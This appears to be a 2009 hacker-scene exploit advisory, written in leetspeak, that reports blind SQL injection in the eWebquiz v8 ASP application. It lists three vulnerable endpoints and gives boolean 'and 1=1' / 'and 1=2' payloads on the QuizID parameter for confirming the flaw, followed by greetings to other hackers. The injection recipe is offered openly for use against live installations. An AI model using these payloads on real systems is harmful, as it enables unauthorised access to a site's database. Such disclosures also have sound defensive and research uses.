[?] ?????????????????????????{In The Name Of Allah The Mercifull}?????????????????????? [?] [~] Tybe: (multi) Blind SQL Injection Vulnerability [~] Vendor: www.activewebsoftwares.com [*] Software: eWebquiz v 8 [*] author: ((R3d-D3v!L)) [*] Date: 18.dec.2009 [*] T!ME: 12:00 am [?] Home: WwW.xP10.ME [?] contact: N/A [?] [?]??????????????????????{DEV!L'5 of SYST3M}?????????????????? [*] Err0r C0N50L3: http://server/questions.asp?QuizID={Xp10} 0R http://server/importquestions.asp?QuizID={offsec} or http://server/quiztakers.asp?QuizID=((r3d D3v!L)) [~] {Xp10}: 7Ru3 : questions.asp?QuizID=1 and 1=1 f4L53: questions.asp?QuizID=1 and 1=2 0R {offsec} 7Ru3 : importquestions.asp?QuizID=1 and 1=1 f4L53: importquestions.asp?QuizID=1 and 1=2 0r ((r3d D3v!L)) 7Ru3 : quiztakers.asp?QuizID=1 and 1=1 f4L53: quiztakers.asp?QuizID=1 and 1=2 N073: N073: ! 7h!/\/k u can f!nd m0r3 just let your m1nd breath ;) ! GAZA !N 0uR HEART's blood and M!ND [~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}---------------------------------- [~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987 [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ [~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4 [?]spechial SupP0RT: MY M!ND ;) & dookie2000ca & ((OFFsec)) [?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA [~]spechial FR!ND: 74M3M [~] !'M 4R48!4N 3XPL0!73R. [~] {[(D!R 4ll 0R D!E)]}; [~]--------------------------------------------------------------------------------